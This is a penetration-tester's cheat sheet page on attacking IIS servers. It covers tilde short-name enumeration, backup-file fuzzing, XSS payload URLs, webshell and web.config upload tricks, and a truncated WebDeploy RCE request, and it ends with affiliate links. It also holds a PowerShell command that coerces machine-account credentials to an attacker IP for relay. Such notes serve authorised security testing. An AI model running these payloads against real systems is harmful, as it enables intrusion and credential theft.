# IIS ## Fuzzing ``` /trace.axd /trace.axd?id=1 /admin/help.cgi /admin/help.cgi.bak /admin/WS_FTP.LOG /adovbs.inc /confirm.asp.bak /default.asp.bak /login.asp.bak /pindex.asp.bak /rootlogin.asp.bak /rootlogin.asp.old /_vti_pvt/service.cnf /include/common.inc /WS_FTP.LOG /service.cnf /_vti_pvt/service.cnf /aspnet_client /global.asax /msdeploy.axd /msdeploy.axd <-- check CVE-2025-53772 ``` Wordlists {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ## trace.axd enable Information leak ## Information disclosure Try ``` target.com/> ``` Often discloses info. ## PUT methode enabled Try uploading .aspx webshell or web.config ## Insecure Upload File Try to upload `web.config` {% embed url="" %} {% embed url="" %} ### Website using PHP It is possible to use “***filename=”web<<“***” in the file upload request. If “web\*\*” replaces another file in the same directory (for example web.aspx), another combination can be used such as “***filename=”web<<>fig”***” or “***filename=’web”config’***”. {% embed url="" %} ## web.config or web.xml ``` https://x.x.x.x/.//WEB-INF/web.config https://x.x.x.x/.//WEB-INF/web.xml ``` ## Viewstate {% embed url="" %} {% embed url="" %} ## Internal IP disclosure ``` > curl -v --http1.0 http://example.com HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Pragma: no-cache Location: https://192.168.5.237/owa/ Server: Microsoft-IIS/10.0 X-FEServer: NHEXCHANGE2016 ``` ## Tilde Enumeration ``` http://example.com/~a http://example.com/~b http://example.com/~c ... ``` Assume the server contains a hidden directory named SecretDocuments. When a request is sent to `http://example.com/~s`, the server replies with a `200 OK` status code, revealing a directory with a short name beginning with "s" ``` http://example.com/~se http://example.com/~sf http://example.com/~sg ... ``` Once the short name `secret~1` is identified, enumeration of specific file names within that path can be performed, potentially exposing sensitive documents ``` http://example.com/secret~1/somefile.txt http://example.com/secret~1/anotherfile.docx ``` The same IIS tilde directory enumeration technique can also detect 8.3 short file names for files within the directory. ``` http://example.com/secret~1/somefi~1.txt ``` If two files named `somefile.txt` and `somefile1.txt` exist in the same directory, their 8.3 short file names would be: * `somefi~1.txt` for `somefile.txt` * `somefi~2.txt` for `somefile1.txt` ## **IIs Tilde Enumration Scanner - Burp Extension**

## **Nuclei Template** ```yaml id: iis-shortname info: name: iis-shortname author: coffin severity: low description: When IIS uses an old .Net Framework it's possible to enumeration folder with the symbol ~. reference: - https://github.com/irsdl/IIS-ShortName-Scanner - https://github.com/lijiejie/IIS_shortname_Scanner - https://www.exploit-db.com/exploits/19525 tags: iis variables: randstring: "{{to_lower(rand_base(8))}}" requests: - raw: - | GET /{{randstring}}*~1*/a.aspx HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - | GET /*~1*/a.aspx' HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - | OPTIONS /{{randstring}}*~1*/a.aspx HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - | OPTIONS /*~1*/a.aspx' HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - | DEBUG /{{randstring}}*~1*/a.aspx HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - | DEBUG /*~1*/a.aspx HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 req-condition: true matchers: - type: dsl dsl: - "status_code_1 != 404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404 || status_code_5 != 404 && status_code_6 == 404" ``` ## ShortScan {% embed url="" %} ``` shortscan http://yourtarget.com -F ``` ## **IIS ShortName Scanner** {% embed url="" %} ```shell-session java -jar iis_shortname_scanner.jar 0 5 http://10.129.204.231/ Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true Do you want to use proxy [Y=Yes, Anything Else=No]? # IIS Short Name (8.3) Scanner version 2023.0 - scan initiated 2023/03/23 15:06:57 Target: http://10.129.204.231/ |_ Result: Vulnerable! |_ Used HTTP method: OPTIONS |_ Suffix (magic part): /~1/ |_ Extra information: |_ Number of sent requests: 553 |_ Identified directories: 2 |_ ASPNET~1 |_ UPLOAD~1 |_ Identified files: 3 |_ CSASPX~1.CS |_ Actual extension = .CS |_ CSASPX~1.CS?? |_ TRANSF~1.ASP ```

Upon executing the tool, it discovers 2 directories and 3 files. However, the target does not permit `GET` access to `http://10.129.204.231/TRANSF~1.ASP`, necessitating the brute-forcing of the remaining filename. Or: {% embed url="" %} ``` # python iis_shortname_scan.py http://target ``` ### **Generate Wordlist** ```shell-session egrep -r ^transf /usr/share/wordlists/ | sed 's/^[^:]*://' > /tmp/list.txt ``` ### Fuzzing ```shell-session gobuster dir -u http://10.129.204.231/ -w /tmp/list.txt -x .aspx,.asp ``` ## XSS ``` http://domain.com/dossier/(Z("onerror="alert%601%60"))/file.aspx http://domain.com/dossier/(Z("onerror="confirm%60Redirect%20Login%60"))/file.aspx ``` See XSS Page - ASP part {% content-ref url="xss" %} [xss](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/xss) {% endcontent-ref %} ## CVE-2025-53772 IIS WebDeploy RCE ``` /msdeploy.axd ``` {% embed url="" %} {% embed url="" %} Sending this payload in an HTTP POST to /msdeploy.axd results in calc.exe launching on the server. ``` POST /msdeploy.axd HTTP/1.1 Host: msdeploy.webserver.com MSDeploy.RequestId: 1 Content-Type: application/msdeploy MSDeploy.Method: Sync MSDeploy.SyncOptions: H4sIAAAAAAAAA...[Generated Payload] Content-Length: 0 ``` ## Resources {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ## Script to configure IIS {% embed url="" %} ## Privilege Escalation To get an HTTP coerce of the machine account ``` powershell iwr http://192.168.56.1 -UseDefaultCredentials ```

than relay to Ldap and : * start\_tls + add a computer to the domain + RBCD \ or * shadow credentials Example with RBCD :

Shell as admin:

Credit: [M4fly](https://x.com/M4yFly/status/1745581076846690811) ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

## Interesting Books {% content-ref url="../../interesting-books" %} [interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more * [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them * [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.